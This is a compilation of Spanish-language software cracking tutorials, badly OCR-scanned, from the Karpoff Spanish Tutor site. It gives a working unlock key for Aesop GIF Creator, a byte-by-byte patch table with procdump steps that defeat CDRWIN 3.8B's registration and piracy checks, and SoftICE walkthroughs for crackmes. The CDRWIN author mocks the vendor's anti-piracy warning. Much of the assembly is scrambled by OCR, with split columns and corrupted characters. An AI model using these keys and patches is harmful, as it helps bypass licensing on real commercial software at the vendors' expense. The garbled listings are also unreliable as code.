0177:0049517b mov eax, [ebp-0104] >y guarda ésa posición de 

>memoria en eax 

0177:00495181 push eax >y envía el unlock key falso 

>a la pila 


0177:00495182 lea eax, [ebp-010c] 

0177:00495188 push eax 

0177:00495189 mov ecx,00000006 

0177:0049518e mov edx,00000004 

0177:00495193 mov eax,00495210 >pone en eax esa constante; si 
>hacemos un "d 00495210" para 
>ver qué tenemos en ésa 


>posición, veremos que contiene 
>una extraña cadena: 
>'mtxmrpntltl' 
0177:00495198 call 00404178 >este call lo que hace es 
>extraer la subcadena 'mrpntl' 
>de la cadena anterior 
0177:0049519d mov eax, [ebp-010c] >y guarda la dirección de dicha 
>subcadena en eax 
0177:004951a3 lea edx, [ebp-0108] 


0177:004951a9 call 00408£20 >este call pasa la subcadena a 
>mayúsculas 

0177:00495lae mov edx, [ebp-0108] >y guarda nuevamente la 
>dirección de la subcadena en 
>edx 

0177:004951b4 pop eax >y recupera nuestro unlock 


>key falso de la pila. con 
>lo cual tenemos la dirección 
>de nuestro unlock key falso 
>en eax y la dirección de una 
>cadena sospechosa en edx. si a 
>ella añadimos las dos 
>instrucciones que siguen, que 
>son típicas, la situación es 
>harto crítica. 

0177:004951b5 call 00404080 >tenemos que examinar éste call 

0177:004951ba jnz 004951d2 

0177:004951bc xor edx, edx 

0177:004951lbe mov eax, [ebx+00000478] 

0177:004951c4 call 0043ebb4 

0177:004951c9 mov byte ptr [ebx+0007fb71],fb 

0177:004951d0 jmp 004951d9 


bien, no nos queda más remedio que examinar qué hace la instrucción 'call 00404080'. para éllo, como 
hemos hecho anteriormente, cuando el cursor se encuentre sobre ésa instrucción pulsamos f8 para tracear el 
procedimiento. nos encontraremos con el siguiente código: 


0177:0040407d lea eax, [eax+00] 

0177:00404080 push ebx >aterrizamos aquí 

0177:00404081 push esi 

0177:00404082 push edi 

0177:00404083 mov esi,eax 

0177:00404085 mov edi, edx 

0177:00404087 cmp eax, edx >compara el registro eax con edx 

0177:00404089 3jz 0040411e >si no son iguales, salta 

0177:0040408f test esi,esi >comprueba si hemos introducido 
>algo 

0177:00404091 3z 004040fb >si no hemos introducido nada, 
>salta 

0177:00404093 test edi,edi >¿comprueba si hay algo en 
>nuestra sospechosa subcadena? 

0177:00404095 3z 00404102 >si está vacía, salta 

0177:00404097 mov eax, [esi-04] >pone la longitud de nuestro 
>unlock key en eax 

0177:004040%9a mov edx, [edi-04] >pone la longitud de nuestra 
>subcadena en edx 

0177:004040%9d sub eax,edx >resta las longitudes 

0177:0040409f ja 004040a3 >si la nuestra es de mayor 


>longitud, salta; la longitud del 
>unlock key que introduzcamos 
>deberá ser 6 


0177:004040a1 add edx,eax >suma los registros eax y edx; 
>como eax será 0, edx permanece 
>inalterado 

0177:004040a3 push edx >envia el valor de edx a la pila 

0177:004040a4 shr edx,02 >hace un desplazamiento binario 


>de 2 bits a la derecha, con lo 
>que edx será igual a 1 


0177: 


0177: 


0177: 


0177: 


0177: 
0177: 


0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177 
0177: 
0177: 
0177: 


0177: 


0177: 
0177: 
0177: 
0177: 


0177: 


0177: 


0177: 
0177: 


0177: 
0177: 


0177: 
0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


0177: 


004040a7 


004 


004 


004 


004 
004 


004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


004 
004 
004 
004 


004 


004 


004 


004 


004 


004 
004 


004 
004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


004 


04 


04 


04 


04 
04 


04 


04 
04 
04 
04 
04 
04 
04 
04 
04 
04 


04 
04 
04 
04 


04 


04 


04 


04 


04 


04 
04 


04 
04 


04 
04 
04 
04 
04 
04 
04 
04 
04 
04 


04 


0a9 


0ab 


Dad 


Daf 
0b1 


0b2 


0b4 
0b7 
Oba 
Obc 
Obe 
0cl 
0c4 
0c5 
0c7 
0c9 


Occ 


Ocf 
0d0 
0d3 
0d5 


0d7 


0d9 


0db 
Odd 


Ode 
0e0 


0e2 
0e4 


0e5 
0e7 
0ed 
0f3 
0f5 
0f7 
0f9 
0Ofb 
Ofe 
100 


102 


jz 004040cf 


mov 


mov 


cmp 


jnz 
dec 


ecx, [esi] 


ebx, [edi] 


ecx, ebx 


00404109 
edx 


jz 004040c9 


mov 
mov 
cmp 
jnz 
add 
add 
dec 
jnz 
jmp 
add 


add 


pop 
and 


ecx, [esi+04] 
ebx, [edi+04] 
ecx, ebx 
00404109 
esi,08 
edi,08 

edx 
004040a9 
004040cf 
esi,04 


edi, 04 


edx 
edx,03 


3z 004040£7 


mov 


mov 


cmp 


jnz 
dec 


ecx, [esi] 


ebx, [edi] 


cl,bl 


0040411e 
edx 


3z 004040£7 


cmp 


jnz 
dec 


ch, bh 


0040411e 
edx 


3z 004040£7 


and 
and 
cmp 
jnz 
add 
jmp 
mov 
sub 
jmp 


mov 


ebx,00ff0000 
ecx,00ff0000 
ecx, ebx 
0040411e 
eax, eax 
0040411e 
edx, [edi-04] 
eax, edx 
0040411e 


eax, [esi-04] 


>si el resultado del 
>desplazamiento es cero, salta; 
>si la longitud del unlock key es 
>6, no saltará 

>pone los cuatro primeros 
>caracteres del unlock key falso 
>en el registro ecx 

>pone los cuatro primeros 
>caracteres de nuestra sospechosa 
>subcadena en el registro ebx 
>compara los dos conjuntos de 
>cuatro caracteres 

>si no son iguales, salta 
>decrementa edx, con lo que es 
>igual a 0 

>en consecuencia, salta. 
>¡estupendo, vayamos allá! 


>suma 4 al registro esi, con lo 
>cual éste apunta al quinto 
>carácter del unlock key falso 
>hace lo mismo con nuestra 
>subcadena sospechosa 


>pone los dos últimos caracteres 
>del unlock key falso en ecx 
>hace lo mismo con los dos 
>últimos caracteres de nuestra 
>subcadena sospechosa 

>compara el quinto carácter del 
>unlock key falso con el quinto 
>carácter de la subcadena 

>si no son iguales, salta 
>decrementa edx, que es el 
>registro que lleva la cuenta de 
>los caracteres que faltan por 
>comparar: edx se pone a 1 ya que 
>sólo nos queda un carácter a 
>comparar 

>¿hemos terminado? 
>compara el secto carácter del 
>unlock key falso con el sexto 
>carácter de la subcadena 

>si no son iguales, salta 
>decrementa edx, lo que one el 
>registro a 0 

>¿hemos llegado al final? ¡sí! 


¡no! 


>aquí se salta al final de la 
>rutina 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177 
0177: 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


04105 
04107 
04109 
0410a 
0410c 
0410e 
04110 
04112 
04115 
04118 
041la 
0411c 
0411e 
0411f 
04120 
04121 


sub eax, edx 
jmp 0040411e 
pop edx 

cmp cl,bl 
jnz 0040411e 
cmp ch, bh 
jnz 0040411e 
shr ecx,10 
shr ebx,10 
cmp cl,bl 
jnz 0040411e 
cmp ch,bh 
pop edi 

pop esi 

pop ebx 

ret 


bueno, no quiero aburrir más al lector con tanto código. sólo decirle que, tanto si el unlock key introducido es 
el correcto como si es el erróneo, al final llegaremos a éste trozo de código: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


0177: 
0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


004951b5 
004951ba 
004951bc 
004951be 
00495104 
004951c9 


004 
004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


951d0 
951d2 


951d9 
951db 
951dc 
951dd 
951de 
95lel 
951le6 
95blec 
951f£1 
951f6 


call 00404080 

jnz 004951d2 

xor edx,edx 

mov eax, [ebx+00000478] 

Call 0043ebb4 

mov byte ptr [ebx+0007fb71],fb >pone el valor 'fb' 
>en ésa posición de 
>memoria para indicar 
>que el unlock key es 
>el correcto 

jmp 004951d9 

mov byte ptr [ebx+0007fb71],00 >y pone el valor '00' 
>para indicar que es 
>erróneo 

xor eax,eax 

pop edx 

pop ecx 

pop ecx 

mov fs: [eax],edx 

push 004951fe 

lea eax, lebp-010c] 

mov edx,00000003 

call 00403d14 

ret 


si ahora retornamos al primer trozo de código veremos que, efectivamente después de la rutina que realiza 
todas las comprobaciones nos encontramos con la comprobación final: 


0177: 
0177: 
0177: 
OLITE 


0048d4e5 
0048d4ea 
0048d4ef 
0048d4f1 


call 00495124 

mov eax, [00498654] >nuestra rutina 

mov eax, [eax] 

cmp byte ptr [eax+0007fb71],fb >¿unlock key 
>correcto? 


bueno, si el lector ha seguido éste tutorial desde el principio podrá fácilmente deducir que la subcadena con la 
que nos hemos topado se corresponde exactamente con el unlock key correcto. recordemos aquí una vez más 
nuestra subcadena: "mrpntl". 


puede el lector en éste punto, por consiguiente, probar dicho unlock key para comprobar si el programa se 
registra. abrimos el aesop gif creator version 1.00.215 y nos desplazamos al menú 'help' y seleccionamos la 
opción 'registration'. en la ventana 'register me!' introducimos 'mrpntl' en el campo 'unlock key". 
inmediatamente se nos mostrará ésta ventana: 


Gi) Application has been successfully registered! 


si ahora seleccionamos la opción 'about' del menú 'help' veremos que el inicial 'unregistered' ha sido 


sustituido por el valor que tengamos en la clave 'registeredowner' que se localiza en: 
'hkey_local_machinelsoftwareWmicrosoftYwindowslXcurrentversion' 


en el registro de windows. 


una última cuestión. tal vez el lector se esté preguntando: ¿de dónde demonios sale ése unlock key? bien, es 
una pregunta que nosotros también nos hacemos, pero ¡vamos a intentar darle una respuesta! 


comoquiera que en el proceso de registro no se nos exige en ningún momento que introduzcamos un name o 
nada similar, y teniendo en cuenta que el 'id' que nos proporciona el programa al instalarse es siempre el 
mismo (con lo cual podemos afirmar que éste 'id' no influirá en el registro), podemos deducir que o bien el 
unlock key está 'hardcoded' en el propio código del programa, o bien usa algún otro método. como lo más 
fácil (y lo más probable) es que se trate de la primera de las posibilidades, vamos a empezar por ahí. 


para éllo haremos un 'dead list' de nuestro ejecutable ("aesop.exe"). arrancamos w32dasm y 
desensamblamos el programa. si alparceamos un poco por las 'string data references' nos encontraremos con 
una extraña cadena que, casualmente, es la misma con la que nos tropezamos mientras tracéabamos la 
rutina con el softice ("mtxmrpntltl"). esto es lo que nos muestra w32dasm: 


* possible stringdata ref from code obj ->"mtxmrpntl1t1" 


:00495193 b810524900 mov eax, 00495210 
:00495198 eBdbeff6ff call 00404178 
:0049519d 8b85f4feffff mov eax, dword ptr [ebp+fffffef4] 


:004951a3 8d95f8fefffft lea edx, dword ptr [ebp+fffffef8] 


bueno, creo que ya todo está claro: no merece la pena seguir. parecía, en principio, bastante complicado y ha 
resultado más simple de lo que pensaba. 


me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


son éstos: tornOdo, the sandman, blackb, +fravia, tnt!, ecd, karpof, wkt. esto no quiere decir que no haya otros 
extraordinarios crackers. 


nota: si le gusta el programa, cómprelo. los programadores pierden demasiado tiempo desarrollando su software como para 
que vengamos nosotros y no les compensemos por su trabajo. ¡no es justo! 


ensayo por: megabite 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: CDRWIN -— CDROM Recording Tools - 3.8B 


PROTECCION: Múltiples comprobaciones de los códigos de desbloqueo. 


Descripcion: Software de copia para CD-R. Versión de Julio del 2000. 


DL 


DOWNLOAD: http://www.goldenhawk.com 


Herramientas: Softlce 3.24, Procdump32, Papel y algo para escribir. 
CRACKER : Arkanian FECHA: 19/10/2000 


| INTRODUCCION 


vamos a ver como saltar las múltiples comprobaciones que realiza este programa tanto en el momento en el 
que intentamos registrarnos como en el inicio del mismo. la protección esta basada en una serie de 
comparaciones seguidas de saltos condicionales, vamos a intentar hacerle creer que somos usuarios "legales" 
del mismo. 


creo que el aviso que nos da la ventana de registro: 'this program is heavily protected against piracy" solo 
esta justificado en la parte del "heavily". ¡es una larga y ardua tarea trazar todo el código donde se realizan 
las comprobaciones!. pero con un poco de paciencia, papel y lápiz, podremos hacer el programa plenamente 
funcional. 


al atake 


previamente haremos una copia en otro lugar de nuestro hd del ejecutable cdrwin.exe. después de esto empezamos. 


para desbloquear el programa, se nos van a pedir varias cosas, name, company / e-mail, un unlock key y un check key, por 
supuesto no disponemos de las dos últimas, de momento... 


rellenamos los datos con lo de siempre, hacemos un ctrl+d, nos vamos a softice, asignamos las ventanas y empezamos 
con la parte seria: 


comando : s 30:0 Ifffffffff "arkanian" 
respuesta: pattern found at 0030:8075e5f2 
comando : s 

respuesta: pattern found at 0030:c0f5ac80 


ok, solo uno y por encima del 80000000, el otro parece un eco de la busqueda, de momento todo bien: 


comando : bpr 30:38075e5f2 30:5075e5f2+8 rw 


queremos que se interrumpa la ejecución del programa cuando lea o escriba en la dirección donde está nuestro nombre. 
lo del +8 es porque el nombre tiene 8 caracteres y queremos abarcar todo el rango de memoria que ocupa. 


seguimos, ctrl+d, click en el botón de unlock y sofice salta en kernel!hmemepy, £12 hasta salir al código real del 
programa en cdrwin!.text+0005a7b debajo de un call [user32!getwindowtexta], limpiamos el breakpoint y de ahí £10 hasta 
aquí: 


:00419dfa e8576c0400 call 00460456 -> venimos de aquí, donde almacena el nombre. 
:00419dff 8d4de4 lea ecx, dword ptr [ebp-1c] -> aterrizamos aquí. 

:00419e02 51 push ecx 

:00419€e03 8b4e60 mov ecx, dword ptr [esi+60] 

:00419e06 eS4b6c0400 call 00460456 ->almacena el nombre de la compañía / e-mail. 
:00419e0b 8b4e64 mov ecx, dword ptr [esi+64] 

:00419e0e 8d55e8 lea edx, dword ptr [ebp-18] 

:00419e11 52 push edx 

:00419e12 eS3£6c0400 call 00460456 -> guarda el unlock key. 

:00419e17 8b4e68 mov ecx, dword ptr [esi+68] 

:00419e1a 8d45ec lea eax, dword ptr [ebp-14] 

:00419e1d 50 push eax 

:00419e1e eS336c0400 call 00460456 -> guarda el check key. 

:00419e23 8d4dbc lea ecx, dword ptr [ebp-44] 


| 

:00419e36 6848604900 push 004960a8 

:00419e3b 52 push edx 

:00419e3c e8d8400300 call 0044df19 -> manipula el unlock key. 
:00419e41 830418 add esp, 00000018 -> corrige la pila. 
:00419e44 83£804 cmp eax, 00000004 -> la comparación... 
:00419e47 018597000000 jne 00419ee4 -> nos manda fuera. 


:00419e60 6828604900 push 00496048 

:00419€65 51 push ecx 

:00419€e66 eSae400300 call 0044df19 -> manipula el check key. 
:00419e6b 83c418 add esp, 00000018 -> corrige la pila. 
:00419e6e 831804 cmp eax, 00000004 -> esta otra comparación... 
:00419e71 7571 jne 00419ee4 -> nos manda fuera. 


¡un alto en el camino 


| A es 
| después de haber trazado el código entrando en todas las llamadas y tomado abundantes notas, llegamos a las 
siguientes conclusiones: 


e tanto el valor de name como el de company son guardados en al menos dos localizaciones 
diferentes de memoria. 

e el primer caracter de todos los datos introducidos se guarda también aparte. 

e en call 0044df19 nuestros unlock key y check key de prueba son encriptados mediante una serie 
consecutiva de xor's y almacenados en al menos dos localizaciones diferentes de memoria antes 
de su manipulación. 

e cualquier otra cosa diferente de 4 en eax después del retorno de la llamada nos manda a la ventana 
de "bad key format". 


cuanto trabajo, total con invertir los saltos... 


primera aproximacion 


84x 85,74 x 75 
cambiamos los dos saltos de arriba por dos jz , un ctrl+d para salir y aquí es cuando empiezan las sorpresas. 
softice no nos deja salir y muestra este sorprendente mensaje: 

break due to windows requested breakpoint. 


aterrizamos debajo de un call [kernel32!raiseexception] en la dirección 44e788, a partir de aquí empiezan los problemas, 
cualquier intento para salir con crtl+d nos deja en esta dirección y forzando con el comando exit nos lleva directamente 
al pantallazo azul del windows y si trazamos un poco para ver donde nos lleva la cosa acabamos en un terrorífico bucle 
donde eax empieza a 00000000 e intenta llegar a ff£fff38, aquí si que podemos salir con un ctrl+d. sólo para ver un 
estupendo mensaje de ''abnormal program termination'' por parte del runtime c++ etc...cuando intentamos entrar de 
nuevo en el programa, este ni siquiera se inicia, salta el softice en esa dirección de raiseexception y volvemos a estar 
en las mismas. 


solución... ¿"nopear” la llamada?. la machacamos con 90's, salimos de softice y obtenemos una maravillosa ventana de 
"this software is now unlocked and fully functionaly"". 


¿ya esta?, ...pues no, un nuevo inicio del programa nos muestra una enorme ventana, de título pirated copy detected, 
que nos recrimina, en una larga parrafada de tono muy correcto, (aparte de llamarnos ladrones), todo lo que estamos 
haciendo. cualquier intento de capturar esta ventana con los bp's adecuados en el inicio del programa, está condenado 
al fracaso. el programa se enfrasca en un tremendo bucle con multitud de llamadas y saltos y al final lo dejas hastiado 
y aburrido. un reinicio del ordenador y una nueva entrada en el programa nos muestra una ventana con un mensaje de 
"error: authorization file data is corrupt / invalid". 


hemos perdido el primer set. 


segunda aproximacion 


(registrar el programa) 


volvemos de nuevo a la carga. desinstalar e instalar el programa de nuevo lleva menos de cinco minutos. vamos a ver 
que hace el programa después del segundo salto. 


| 84 x 85, 74 x 75 y call 0041f3d0 


poco después del segundo salto entramos en esta llamada y aquí encontramos más comparaciones y saltos 
| E: pS . 
| condicionales. veamos un pequeño ejemplo: 


* referenced by a call at address: 
1:00419e86 


:0041f3d0 8b4c2410 mov ecx, dword ptr [esp+10] 
:0041£3d4 53 push ebx 

:0041£3d5 55 push ebp 

:0041£3d6 56 push esi 

:0041f3d7 8b742418 mov esi, dword ptr [esp+18] 
:0041£3db 8b19 mov ebx, dword ptr [ecx] 
:0041£3dd 57 push edi 

:0041f3de 8b3e mov edi, dword ptr [esi] 
:0041f3e0 8b4604 mov eax, dword ptr [esi+04] 
:0041f3e3 8bd7 mov edx, edi 

:0041f3e5 33d0 xor edx, eax 

:0041£3e7 3bda cmp ebx, edx -> primera comparación. 
:0041£3e9 7525 ¡ne 00411410 -> saltamos... 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
|:0041f3e9(c), :0041f3f7(c), :0041f405(c) -> ¡tres veces! 


| 
:0041£410 6400 push 00000000 -> aquí. 


:0041f412 6200 push 00000000 

:0041f414 6200 push 00000000 

:0041f416 6838ffffff push ffffff38 -> ¡mira lo que hay aquí! 

:0041f41b e850330000 call 00422770 -> por aquí aterrizamos en kernel32!raiseexception. 
:0041f420 830410 add esp, 00000010 


los parametros y valores de los registros antes de la comparación son los valores encriptados que el programa ha 
obtenido mediante la manipulación de nuestros códigos de prueba en el call 0044df19. las comparaciones y los saltos 
condicionales se suceden uno detras de otro. 


como puedes ver en ejemplo anterior, el salto a 0041f410 aparece en tres lugares diferentes. y esto es sólo el principio, 
existen varios saltos más a direcciones diferentes, pero, como regla general (casi) todos llevan a tres push 00000000 (o 
push eax), una instrucción push ffffffxx (donde xx es por orden de aparición 38, 37, 34, y 35). y van seguidos de un call 
00422770. así que con un poco de paciencia, papel y lápiz, obtenemos esta tabla: 


e datos a cambiar durante el proceso de registro: 


[dirección | instrucción [| valorhex [| cambiara 
| :00419e47 | jnz.00419ce4 | 0£85 0f 84 
| :00419e71 | jnz 00419ee4 7571 7471 
| :0041f3e9 | ¿nz.0041f410 75 25 74 25 
| :004113f7 | jnz 0041f410 7517 74 17 
| :0041f405 | jnz 0041f410 | 75 09 74 09 
| :0041f40e | jz 00411423 | 7413 75 13 
| :0041f438 jnz 0041f44a | 75 10 74 10 
| :0041f45c | jle 00411476 | 7e 13 7d 13 
| :00420083 (1) jz 004200b9 | 74 34 75 34 


(1) la excepción que confirma la regla. 


trazamos un rato más sólo por comprobar que no queda nada, salimos de softice y volvemos a tener la estupenda 
ventana de '...unlocked and fully functional”. 


ganamos el segundo set y empatamos el partido. 


segunda aproximacion 


(inicio del programa) 


espero que hayas tomado las oportunas notas de todo lo que has cambiado porque hasta aquí es sólo la mitad del 
trabajo. 


cuando ejecutamos el programa, este, vuelve a realizar el mismo proceso, con el mismo código pero en direcciones 
diferentes y como lo que encuentra como códigos de desbloqueo no le cuadra nos manda el mensajito de '...corrupt 
file". 


vamonos al loader de softice. 


symbol loader 


después de algunas pruebas en plan ensayo-error, vamos cercando nuestra presa. en call 0041£1e0 volvemos a encontrar 
saltos condicionales seguidos de la secuencia de instrucciones push ffffffxx (donde xx es ahora 33, 36, etc..).¡más 
trabajo!. 


atención ahora, esto es importante, hay una última comprobación con otro salto condicional en 4035e1, que si no lo 
parcheamos, nos manda al enorme bucle del primer intento y a la ventana de pirated copy detected. esta es la tabla 
con los cambios a realizar: 


e datos a cambiar durante el inicio del programa: 


dirección instrucción valor hex | cambiar a 
:00411353 jnz 00411365 | 7510 | 7410 
| :00411384 jle 00411399 7e 13 | 7d 13 


| :004035c1(1) | jnz.00403605 75 42 | 74 42 


(1) este es el más jodido de encontrar. 


salimos de softice y ¡ya tenemos el programa entero!, observarás que el botón que lleva a la ventana de registro ha 
desaparecido. pulsando con el botón derecho del ratón sobre la esquina superior izquierda (sobre el icono) y eligiendo 
del menú que aparece la opción about, veremos el programa adecuadamente registrado a nuestro nombre. 


ahora, ¿cómo trasladar todos estos cambios?, ...¿a pedales con un editor hexadecimal?, es una opción. pero es posible 
que si lo hacemos así, aparte de ser largo y trabajoso, nos tengamos que enfrentar a otras medidas de seguridad. mucho 
más rápido y sencillo es usar procdump32. así que sin cerrar edrwin abrimos procdump. 


procdump32 


seleccionamos en el cuadro task la línea cAcdrwin31cdrwin.exe, le damos al botón derecho y seleccionamos process 
infos, de ahí a sections, seleccionamos .text, con el boton derecho de nuevo elegimos save section to disk y le 
llamamos, por ejemplo, edr.bin. 


nos vamos al botón pe editor, buscamos la copia que hemos realizado previamente de cdrwin.exe, vamos a sections, 
seleccionamos .text y con el botón derecho a load section from disk, buscamos cdr.bin le decimos que ok y luego en 
apply changes method marcamos la opción to pe file, ok de nuevo y ya tenemos nuestro programa totalmente 
funcional. 


cerramos procdump y edrwin. sólo queda ir al directorio cdrwin3, renombrar el "viejo" cdrwin.exe (por si acaso), 
trasladar nuestro flamante cdrwin.exe, comprobar que funciona correctamente y borrar el "viejo". 


juego, set y partido. 


sobre la ventana "pirated copy detected" 


no quisiera acabar este ensayo sin hacer algunos comentarios sobre el texto de la citada ventana. es más, solo voy a 
decir cuatro cosas: 


1. los usuarios, desde vuestro punto de vista, son necesarios porque pagan y punto. así que no me 
vengais con historias raras. 

2. nadie os está robando nada, si este tipo de software es puesto a nuestra disposición durante 30 
días y luego, como decís, ''no question asked'' sobre para qué va a ser utilizado, copias ilegales 
de cd's supongo, no se a que vienen las quejas. solo lo he utilizado por y para los fines que he 
creido convenientes. 

3. "nadie espera que tú trabajes gratis'', cierto, ahí estoy de acuerdo. acabamos de demostrar que 
la afirmación "heavily protected' es pura fachada y para ello hemos invertido muchas horas de 
duro trabajo. cualquier detalle por vuestra parte en forma de talón al portador será bien recibido ;- 


) 
4. ¡hala!, a kaskarla.... 


hasta otra.. 
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INTRODUCCION 


saludos amigos!. nos vemos una vez más con otro tutorial. esta vez, de un crackme nuevito. se trata del 
crackme 1 del amigo karpoff. realmente, aunque no es ni muy fácil ni muy difícil de crackear, su protección es 
mucho mejor que la de algunos programas. ya verán cuanto tendremos que tracear. con este manual parecerá fácil 
pero sin ayuda muchos estarían despistados. vamos a crackear!. 


antes que nada analizamos el crackme con el file inspector o cualquier analizador de archivos. vemos que no está 
encryptado ni empaketado con algo por lo que las cosas se nos van haciendo fáciles. lo ejecutamos y seleccionamos la opción 
para registrarnos. mi serial será 123456. ponemos registrar y no sale ningún mensaje de error, solo se borra el texto que 
introducimos. esto nos dice una cosa, que la única alternativa que nos queda es usar hmemcpy. [ctrl +d], bpx hmemcpy y f5 
para salir del sice. pulsamos registrar y estamos en el sice. 


como siempre estamos en las dlls. pulsamos f12 12 veces o f12 7 veces y luego f10 hasta que terminen todos los ret y 


aparecemos aquí: 


:00442b10 8b86dc020000 mov eax, dword ptr [esi+000002dc] 
:00442b16 e8alf8faff call 004223bc 


:00442b1b 8b86dc020000 mov eax, dword ptr [esi+000002dc]<----- aquí aparecemos 


:00442b21 8b10 mov edx, dword ptr [eax] 
:00442b23 f£f92b0000000 call dword ptr [edx+000000b0] 
:00442b29 8b55£8 mov edx, dword ptr [ebp-08] 
:00442b2c 8b45fc mov eax, dword ptr [ebp-04] 


:00442b2f e85c4dfoff 
:00442b34 8bd8 
:00442b36 837dfc00 


call 00407890 Sorrranccacaame llama a la rutina de comprobación 
mov ebx, eax 
cmp dword ptr [ebp-04], 00000000 


:00442b3a 7448 Jz 00442084 Sornnnnnnaccao- que esto no los despiste!!! 
:00442b3c 85db test €ebx, ebx rn compara si el flag z es O 
:00442b3e 7536 jnz 00442D7 6 rana esta es una zona muy interesante 
:00442b40 33d2 xor edx, edx 

:00442b42 8b86dc020000 mov eax, dword ptr [esi+000002dc] 

:00442b48 e887f7fdff call 004222d4 

:00442b4d 33d2 xor edx, edx 

:00442b4f 8b86e0020000 mov eax, dword ptr [esi+000002e0] 


hasta aquí vamos bien. no se despisten con el primer jz ya que no nos es importante. el segundo es el que define si nos 
vamos a registrar o no. ¿cómo sé que es el segundo y no el primero?. 


1) por que arriba hay un test ebx, ebx y esto compara si el flag es O 
2) por que podemos comprobarlo invirtiendo el flag con el comando del sice r fl z 


el salto va a algúna dirección de memoria. vamos a inspeccionar. para ir a determinada dirección de memoria en el sice 
debemos escribir y la dirección de memoria. en este caso escribiremos y 00442b76 que es la dirección a la que saltará si el 
flag es 1. después de llegar a 00442b76 pulsamos f10 más o menos 11 veces hasta llegar aquí: 


:00442b89 648910 mov dword ptr fs: [eax], edx 

:00442b8c 68a62b4400 push 00442ba6 

:00442b91 8d45f£8 lea eax, dword ptr [ebp-08] 

:00442b94 ba02000000 mov edx, 00000002 

:00442b99 e84e0dfc£f£ call 00403880 Grnnnnnnnnnnno-- aquí debemos pararnos 
:00442b9e c3 RN devuelve 1 si nos registramos 
:00442b9f e%bcO7fcff jmp 00403360 

:00442ba4 ebeb jmp 00442b91 

:00442ba6 5e pop esi 

:00442ba7 5b pop ebx 


mi instinto cracker me dice que esta zona es interesante, sobre todo por el ret después de la call. pero nuestro serial no 
está por aquí, tenemos que meternos en la call y buscar. nos paramos sobre la call y apretamos f8 para entrar. aparecemos 


aquí: 

:004038ea c3 ret 

:004038eb 90 nop 

:004038ec 53 push ebx 

:004038ed 56 push esi 

:004038ee 89%c3 mov ebx, eax 

:004038f0 89d6 mov esi, edx 

:004038f£2 8b13 mov edx, [ebx] 

:004038f4 85d2 test edx, edx oro tenemos que pararnos aquí 
:004038f6 74la jz 00403912 Errrncnnnnannncnnnnnannmes si es cero, registrado!!! 
:004038f8 c70300000000 mov dword ptr [ebx], 00000000 

:004038fe 8b4af8 mov ecx, dword ptr [edx-08] 

:00403901 49 dec ecx 


para pararnos sobre la comparación le damos a f10 7 veces luego de entrar en la call. vemos el valor de los registros hasta 


uff que costó descubrir el camino, pero ahora ya terminamos. espero que practiquen mucho más. si quieren muchas víctimas 
bájense esto. creo que trae 27 programas víctimas y sus protecciones son muy inferiores a la de este crackme. felicitaciones 


karpoff!. saludos a todos y nos vemos en mi próximo manual!, 


astalavista 
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introduccion 


antes de leer esto, tened en cuenta de que está hecho por un principiante y para principiantes. 
por eso la mayoría de las explicaciones estarán de sobra para muchos. como siempre, intento explicar las 
cosas como me hubiese gustado que me las explicaran a mí. 


al atake 
echando un vistazo 


al ejecutar crakpad.exe aparece un mensaje. cerramos la ventanita y pasamos a softice (ctrl+d) para poner un 
breakpoint en la api que nos ha mostrado el mensaje. tecleamos bpx messageboxa. salimos de softice (f5) y 
ejecutamos de nuevo crakpad.exe. aparecemos de nuevo en softice. tras pulsar f12 aparece de nuevo el mensaje. 
hacemos clic en el botón del mensaje y volvemos a softice. ahora estamos en la siguiente instrucción, tras la llamada a 
esa api. (00406294). examinando el código (ctrl+flecha arriba/abajo) vemos que poco más arriba hay otra api 
interesante: getlocaltime. ponemos un bpx en esa línea (:00406237), quitamos el bpx messageboxa y salimos de 
softice (£5). 

primer contratiempo: el bpx en la línea del getlocaltime no hace que softice salte al ejecutar el crakpad. creo que esto 
se debe a que al estar el archivo comprimido, no reconoce las direcciones que aparecen al término de la 
descompresión. cambio de enfoque. abrimos el exe con el loader de softice y ponemos un bpx getlocaltime y dejamos 
correr (f5)... bien! esta vez sí: se detiene la ejecución por la interrupción que provoca getlocaltime. f12 y aparecemos 
en el código de crakpad en la línea siguiente a la llamada a esa api. la idea ahora es ver qué pasa si evitamos los efectos 
de esta api. 

justo tras la llamada hay una comparación y un par de saltos condicionales y más abajo otro incondicional que lleva a 
00401000, precedido de un popad. ¿os suena esto? es el salto al punto de entrada original (oep) del bloc de notas. 
quitamos el bpx getlocaltime. pulsamos a y enter para editar la línea en que se ha detenido la ejecución. aparece la 
dirección a la izquierda y escribimos ¡mp 0040100. enter dos veces (una para hacer efectivos los cambios y la 


segunda para salir del modo edición) y f5 para dejar correr el programa. ya está: se abre el bloc, rebautizado para la 
ocasión como crakpad. ya sabemos cómo burlar la protección temporal de este crackme. ahora hace falta implementar 
un patch para perpetuar ese cambio. 

r!sc dice explícitamente que no se pueden usar cargadores para romper esta protección. la alternativa es inyectar 
código. la pregunta del millón es dónde. sabido es que los compresores suelen borrar y sobreescribir secciones 
mientras se activan las rutinas de descompresión. para que las modificaciones que hará nuestro patch no sean alteradas 
luego por las rutinas de descompresión, lo ideal es que el salto al injerto se produzca cuando el exe esté completamente 
descomprimido y desplegado en memoria. lo mejor para eso es hallar la última instrucción de las rutinas de 
descompresión, es decir, la que salta al punto de entrada del programa comprimido. en ese caso, lo que se hace es 
redirigir el salto al injerto de código para que este modifique el código del ejecutable. la última instrucción del injerto 
es un salto que vuelve al punto de entrada para que el programa se ejecute, ahora ya con los cambios que hemos 
codificado desde el injerto. 

la siguiente tarea es, por tanto, determinar el final de la rutina de descompresión para saltar desde ahí a una zona donde 
podamos escribir el parche, volver y que siga ejecutándose el programa, pero con el parche hecho. 


